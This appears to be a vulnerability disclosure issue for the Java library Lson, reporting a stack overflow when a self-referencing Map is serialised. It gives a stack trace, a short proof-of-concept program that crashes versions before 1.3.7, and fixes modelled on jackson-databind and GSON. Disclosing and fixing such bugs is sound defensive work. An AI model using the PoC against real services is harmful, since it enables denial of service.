Stack overflow error caused by Lson serialization Map #2
Description
Stack overflow error caused by Lson serialization Map
Description
Lson before v1.3.7 was discovered to contain a stack overflow via the Map parameter.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at java.base/java.lang.StringBuilder.<init>(StringBuilder.java:104)
at java.base/java.lang.Class.toString(Class.java:191)
at cn.luern0313.lson.util.TypeUtil.getName(TypeUtil.java:87)
at cn.luern0313.lson.util.TypeUtil.isPrimitivePlus(TypeUtil.java:112)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:42)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
at cn.luern0313.lson.Serialization.listToJson(Serialization.java:67)
at cn.luern0313.lson.Serialization.toJson(Serialization.java:47)
PoC
<dependency>
<groupId>cn.luern0313.lson</groupId>
<artifactId>Lson</artifactId>
<version>0.90</version>
</dependency>import cn.luern0313.lson.LsonUtil;
import java.util.HashMap;
public class PoC {
public static void main(String[] args) {
HashMap<String,Object> map=new HashMap<>();
map.put("t",map);
LsonUtil.toJson(map);
}
}Rectification Solution
-
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
-
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))